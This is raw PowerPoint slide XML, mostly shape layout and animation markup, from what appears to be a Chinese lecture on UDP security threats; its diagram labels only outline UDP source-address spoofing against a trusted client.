          <a:xfrm rot="10800000">
            <a:off x="2339975" y="2997200"/>
            <a:ext cx="5111750" cy="1800225"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 611"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:bevel/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="45065" name="Shape 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4718050" y="4797425"/>
            <a:ext cx="2446338" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -10769"/>
              <a:gd name="adj2" fmla="val 486139"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:bevel/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4506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275" y="4724400"/>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TextBox 73"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6419850" y="5653088"/>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5068" name="TextBox 74"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3492500" y="5734050"/>
            <a:ext cx="1679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800">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45069" name="TextBox 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1092200" y="3717925"/>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可信客户端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5070" name="TextBox 76"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5043488" y="3284538"/>
            <a:ext cx="18907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600" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gungsuh" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="Gungsuh" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:sym typeface="Gungsuh" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>① </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>请求源地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pP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800">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45071" name="TextBox 77"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5292725" y="2586038"/>
            <a:ext cx="127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600" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gungsuh" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="Gungsuh" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:sym typeface="Gungsuh" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>② </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>应答</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140304" name="Freeform 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="395288" y="836613"/>
            <a:ext cx="1800225" cy="1655762"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1296144"/>
              <a:gd name="T1" fmla="*/ 1719360 h 1296144"/>
              <a:gd name="T2" fmla="*/ 703517 w 1296144"/>
              <a:gd name="T3" fmla="*/ 503587 h 1296144"/>
              <a:gd name="T4" fmla="*/ 2401967 w 1296144"/>
              <a:gd name="T5" fmla="*/ 1 h 1296144"/>
              <a:gd name="T6" fmla="*/ 4100407 w 1296144"/>
              <a:gd name="T7" fmla="*/ 503590 h 1296144"/>
              <a:gd name="T8" fmla="*/ 4803926 w 1296144"/>
              <a:gd name="T9" fmla="*/ 1719368 h 1296144"/>
              <a:gd name="T10" fmla="*/ 4100404 w 1296144"/>
              <a:gd name="T11" fmla="*/ 2935138 h 1296144"/>
              <a:gd name="T12" fmla="*/ 2401961 w 1296144"/>
              <a:gd name="T13" fmla="*/ 3438729 h 1296144"/>
              <a:gd name="T14" fmla="*/ 703517 w 1296144"/>
              <a:gd name="T15" fmla="*/ 2935138 h 1296144"/>
              <a:gd name="T16" fmla="*/ 8 w 1296144"/>
              <a:gd name="T17" fmla="*/ 1719368 h 1296144"/>
              <a:gd name="T18" fmla="*/ 0 w 1296144"/>
              <a:gd name="T19" fmla="*/ 1719360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en-US" altLang="zh-CN" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>假冒</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>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500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45060"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45060"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45060"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="10" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="45066"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45066"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45066"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45066"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="15" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="45061"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45061"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45061"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45061"/>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45069"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45069"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45069"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45069"/>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5068"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45068"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45068"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4506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5067"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45067"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45067"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45067"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="36" presetID="17" presetClass="entr" presetSubtype="10" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="45063"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45063"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45063"/>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45062"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45062"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4506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5065"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45065"/>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45070"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="51" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45070"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45070"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4507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45064"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45064"/>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45071"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45071"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="62" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45071"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="63" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="450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animBg="1"/>
      <p:bldP spid="45065" grpId="0" animBg="1"/>
      <p:bldP spid="45067" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="45068" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="45069" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="45070" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="45071" grpId="0" bldLvl="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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>UDP的安全威胁</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7F7F7F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4608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26368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652963"/>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6" name="Shape 10"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2419350" y="3108325"/>
            <a:ext cx="4862513" cy="1544638"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="41275">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:bevel/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="46087" name="Shape 12"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2419350" y="3108325"/>
            <a:ext cx="1905000" cy="1616075"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="41275">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:bevel/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4608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275" y="4724400"/>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TextBox 73"/>
          <p:cNvSpPr>
